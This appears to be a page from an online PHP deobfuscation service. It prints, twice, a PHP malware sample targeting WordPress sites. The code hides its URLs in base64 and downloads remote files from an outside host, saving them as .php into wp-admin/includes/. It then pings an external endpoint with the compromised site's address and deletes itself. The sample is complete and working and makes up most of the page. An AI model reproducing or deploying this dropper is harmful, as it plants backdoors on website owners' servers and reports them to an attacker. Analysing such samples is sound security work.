Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

malware<?phperror_reporting(0);functionbase64_url_decode($input){returnbase64_decode(strtr..

Decoded Output download

malware<?phperror_reporting(0);functionbase64_url_decode($input){returnbase64_decode(strtr($input,'-_','+/'));}$remote_file_urls_base64=array('aHR0cDovL3l0a2o3Ny5jb20vaW5jbHVkZS9xcmNvZGUvdGVtcC50eHQ=','aHR0cDovL3l0a2o3Ny5jb20vaW5jbHVkZS9xcmNvZGUvbG9ncy50eHQ=');$remote_file_urls=array();foreach($remote_file_urls_base64as$url_base64){$remote_file_urls[]=base64_url_decode($url_base64);}$save_to_dir='wp-admin/includes/';$url="http".(isset($_SERVER['HTTPS'])?"s":"")."://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];$current_protocol=$_SERVER['REQUEST_SCHEME'];$current_domain=$_SERVER['HTTP_HOST'];$current_url=$current_protocol."://".$current_domain;$failure_notification_sent=false;$success_notification_sent=false;foreach($remote_file_urlsas$remote_file_url){$file_name=basename($remote_file_url);$file_name=str_replace('.txt','.php',$file_name);$save_to_path=$save_to_dir.$file_name;$ch=curl_init($remote_file_url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$file_content=curl_exec($ch);curl_close($ch);if($file_content===false){if(!$failure_notification_sent){$urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);$curl=curl_init($decoded_url.$url.'&note=');curl_exec($curl);curl_close($curl);$failure_notification_sent=true;}echo"
";}else{$save_result=file_put_contents($save_to_path,$file_content);if($save_result!==false){if(!$success_notification_sent){$urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);$curl=curl_init($decoded_url.$current_url.'/'.$save_to_dir.'temp.php'.'&note=');curl_exec($curl);curl_close($curl);$success_notification_sent=true;}$file=__FILE__;unlink($file);}else{if(!$failure_notification_sent){$urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);$curl=curl_init($decoded_url.$url.'&note=');curl_exec($curl);curl_close($curl);$failure_notification_sent=true;}}}}?>

Did this file decode correctly?

Original Code

malware<?phperror_reporting(0);functionbase64_url_decode($input){returnbase64_decode(strtr($input,'-_','+/'));}$remote_file_urls_base64=array('aHR0cDovL3l0a2o3Ny5jb20vaW5jbHVkZS9xcmNvZGUvdGVtcC50eHQ=','aHR0cDovL3l0a2o3Ny5jb20vaW5jbHVkZS9xcmNvZGUvbG9ncy50eHQ=');$remote_file_urls=array();foreach($remote_file_urls_base64as$url_base64){$remote_file_urls[]=base64_url_decode($url_base64);}$save_to_dir='wp-admin/includes/';$url="http".(isset($_SERVER['HTTPS'])?"s":"")."://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];$current_protocol=$_SERVER['REQUEST_SCHEME'];$current_domain=$_SERVER['HTTP_HOST'];$current_url=$current_protocol."://".$current_domain;$failure_notification_sent=false;$success_notification_sent=false;foreach($remote_file_urlsas$remote_file_url){$file_name=basename($remote_file_url);$file_name=str_replace('.txt','.php',$file_name);$save_to_path=$save_to_dir.$file_name;$ch=curl_init($remote_file_url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$file_content=curl_exec($ch);curl_close($ch);if($file_content===false){if(!$failure_notification_sent){$urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);$curl=curl_init($decoded_url.$url.'&note=');curl_exec($curl);curl_close($curl);$failure_notification_sent=true;}echo"\n";}else{$save_result=file_put_contents($save_to_path,$file_content);if($save_result!==false){if(!$success_notification_sent){$urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);$curl=curl_init($decoded_url.$current_url.'/'.$save_to_dir.'temp.php'.'&note=');curl_exec($curl);curl_close($curl);$success_notification_sent=true;}$file=__FILE__;unlink($file);}else{if(!$failure_notification_sent){$urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);$curl=curl_init($decoded_url.$url.'&note=');curl_exec($curl);curl_close($curl);$failure_notification_sent=true;}}}}?>

Function Calls

None

Variables

None

Stats

MD5	16a6aafa9800cf06cb044850f7a253b0
Eval Count	0
Decode Time	55 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats